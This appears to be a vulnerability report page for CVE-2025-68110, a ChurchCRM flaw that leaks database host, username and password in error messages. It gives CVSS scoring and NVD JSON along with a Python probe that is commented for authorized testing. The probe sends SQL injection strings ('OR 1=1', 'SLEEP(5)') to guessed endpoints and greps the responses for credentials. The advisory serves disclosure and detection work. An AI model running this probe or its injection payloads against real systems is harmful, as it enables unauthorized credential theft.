Security Vulnerability Report
CVE-2025-68110 CVSS 9.9 CRITICAL

CVE-2025-68110

Published: 2025-12-17 22:16:01
Last Modified: 2025-12-18 18:29:30

Description

ChurchCRM is an open-source church management system. Versions prior to 6.5.3 may disclose database information in an error message including the host, ip, username, and password. Version 6.5.3 fixes the issue.

CVSS Details

CVSS Score
9.9 (GitHub Security Advisory scoring, listed by NVD as the secondary source)
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Note: NVD's own (primary) assessment of the same issue is 8.8 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H; the two differ only in scope (S:C vs S:U). Both agree on PR:L, i.e. an authenticated ChurchCRM account is needed to reach the leaking error path. Weakness: CWE-209 (generation of error message containing sensitive information); the GitHub source additionally lists CWE-200.

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 6.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a heuristic probe, not a confirmed exploit: it sends malformed requests to a handful of guessed endpoints and greps the responses for text that looks like a database connection string or raw database error. Any hit it prints must be verified by hand, and because the advisory rates the issue PR:L the requests will most likely need a valid session cookie to reach the vulnerable code path.
python
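# CVE-2025-68110 PoC - ChurchCRM Database Information Disclosure
#
# Probes a ChurchCRM instance with malformed requests and greps the responses
# for text that looks like database connection details (host, username,
# password) or a raw database error.  It is a heuristic detector, not a
# confirmed exploit: every hit printed below must be verified by hand.
#
# NOTE(review): the advisory scores this PR:L (low privileges required), so an
# authenticated session is very likely needed to reach the leaking error path.
# Populate SESSION_COOKIES with a valid ChurchCRM session before running;
# unauthenticated requests will most likely just be redirected to the login
# page and the probe will report nothing.
from __future__ import annotations

import re
import sys
from urllib.parse import quote

import requests

TARGET_URL = "http://target-churchcrm.com/ChurchCRM"

# Cookies for an authenticated ChurchCRM session, e.g. {"CRM_SESSION": "..."}.
# Empty means the requests go out unauthenticated.
SESSION_COOKIES = {}

# Per-request timeout in seconds.  The "SLEEP(5)" probe below, if it actually
# reaches the database, deliberately stalls that one request for ~5 s, so keep
# this comfortably above 5.
REQUEST_TIMEOUT = 10

# TLS certificate verification.  The original PoC disabled it (lab hosts with
# self-signed certificates); leave it False only for such targets, since a
# disabled check makes the tool itself trivially interceptable on the wire.
VERIFY_TLS = False

HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
}

# Endpoints that may trigger a verbose database error: generic probes (an odd
# search call, quote-injection into an ID parameter, an invalid report name).
# The advisory on this page does not name the exact path that leaks the
# credentials, so treat this list as a starting point, not as authoritative.
TEST_ENDPOINTS = [
    "/FindIndividual.php?Search=1&AJAX_request=true",
    "/PersonEditor.php?PersonID=' OR 1=1 --",
    "/api/persons?search=test' AND SLEEP(5) --",
    "/FinancialReports.php?report=invalid",
]

# Patterns suggesting that connection details or a raw DB error leaked into
# the response body.  They are loose on purpose and will produce false
# positives (e.g. the word "localhost" in ordinary page text).  Compiled once
# here instead of on every request.
DB_INFO_PATTERNS = [
    re.compile(pattern, re.IGNORECASE)
    for pattern in (
        r'(mysql|postgresql|sqlite):[^\s]+',  # Database connection strings
        r'localhost[:\d]*',                   # Host information
        r'user[=:]\s*\w+',                    # Username hints
        r'password[=:]\s*\S+',                # Password hints
        r'Database.*?error',
        r'SQLSTATE.*?\d+',
        r'MySQL.*?error',
        r'Connection.*?failed',
    )
]

# First release that the advisory says fixes the issue.
FIXED_VERSION = (6, 5, 3)


def _find_db_info(body: str) -> list[str]:
    """Return the full text of every DB_INFO_PATTERNS match found in *body*.

    Uses finditer()/group(0) rather than findall(): with findall() a pattern
    that contains a capture group (the connection-string one) reports only the
    captured scheme name ("mysql"), throwing away the interesting part.
    """
    return [
        match.group(0)
        for pattern in DB_INFO_PATTERNS
        for match in pattern.finditer(body)
    ]


def _parse_version(version: str) -> tuple[int, ...]:
    """Turn a dotted version string such as "6.5.2" into a comparable int tuple.

    Empty components (the version regex in check_version can capture a
    trailing dot, e.g. "6.5.") are skipped rather than raising.
    """
    return tuple(int(part) for part in version.split(".") if part)


def is_vulnerable_version(version: str) -> bool:
    """Return True if *version* sorts numerically before the fixed release 6.5.3.

    Numeric tuple comparison replaces the original string comparison, which
    mis-orders multi-digit components ("6.10.0" < "6.5.3" as strings).
    A string with no numeric components at all yields False, since nothing
    can be concluded from it.
    """
    parsed = _parse_version(version)
    return bool(parsed) and parsed < FIXED_VERSION


def _get(base_url: str, path: str) -> requests.Response:
    """Issue one GET to base_url + path with the module-wide request settings."""
    return requests.get(
        base_url + path,
        headers=HEADERS,
        cookies=SESSION_COOKIES,
        timeout=REQUEST_TIMEOUT,
        verify=VERIFY_TLS,
    )


def test_database_info_disclosure(base_url: str = TARGET_URL) -> None:
    """Probe each TEST_ENDPOINTS path and print anything resembling DB details.

    Args:
        base_url: ChurchCRM base URL (defaults to TARGET_URL).

    Side effects: one HTTP GET per endpoint; findings are printed, nothing is
    returned.  A request that fails at the transport level is reported and
    skipped so that the remaining endpoints are still tested.
    """
    print("[*] Testing ChurchCRM for database info disclosure...")
    for endpoint in TEST_ENDPOINTS:
        try:
            response = _get(base_url, endpoint)
        except requests.exceptions.RequestException as exc:
            print(f"[-] Error testing {endpoint}: {exc}")
            continue

        hits = _find_db_info(response.text)
        if hits:
            print(f"[!] Potential database info found at {endpoint}:")
            for hit in hits:
                print(f" {hit}")


def check_version(base_url: str = TARGET_URL) -> None:
    """Fetch SystemSettings.php and report whether the version looks < 6.5.3.

    Args:
        base_url: ChurchCRM base URL (defaults to TARGET_URL).

    The original referenced a ``headers`` local that only existed inside
    test_database_info_disclosure (a NameError) and swallowed every exception
    with a bare ``except``; this version uses the module-level settings and
    reports transport failures instead of hiding them.
    """
    try:
        response = _get(base_url, "/SystemSettings.php")
    except requests.exceptions.RequestException as exc:
        print(f"[-] Error fetching version page: {exc}")
        return

    # The regex is loose: "version" followed by digits matches any such text on
    # the page, not necessarily the ChurchCRM release number.  Treat the result
    # as a hint to be confirmed, not as proof.
    version_match = re.search(r'version[:\s]*([\d.]+)', response.text, re.IGNORECASE)
    if not version_match:
        return
    version = version_match.group(1)
    print(f"[*] Detected ChurchCRM version: {version}")
    if is_vulnerable_version(version):
        print("[!] Target is potentially vulnerable")


if __name__ == "__main__":
    # Optional: pass the base URL on the command line instead of editing
    # TARGET_URL, e.g. ``python poc.py https://crm.example.test/ChurchCRM``.
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    test_database_info_disclosure(target)
    check_version(target)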

References

https://github.com/ChurchCRM/CRM/security/advisories/GHSA-82mq-xc2j-3qv2 — vendor advisory (tagged "Exploit, Vendor Advisory" by both NVD and the CISA ADP source in the JSON below).

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68110", "sourceIdentifier": "[email protected]", "published": "2025-12-17T22:16:00.913", "lastModified": "2025-12-18T18:29:30.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Versions prior to 6.5.3 may disclose database information in an error message including the host, ip, username, and password. Version 6.5.3 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-209"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.3", "matchCriteriaId": "5B1435CA-1370-4154-85E0-6AF1846DEEBD"}]}]}], "references": [{"url": 
"https://github.com/ChurchCRM/CRM/security/advisories/GHSA-82mq-xc2j-3qv2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-82mq-xc2j-3qv2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}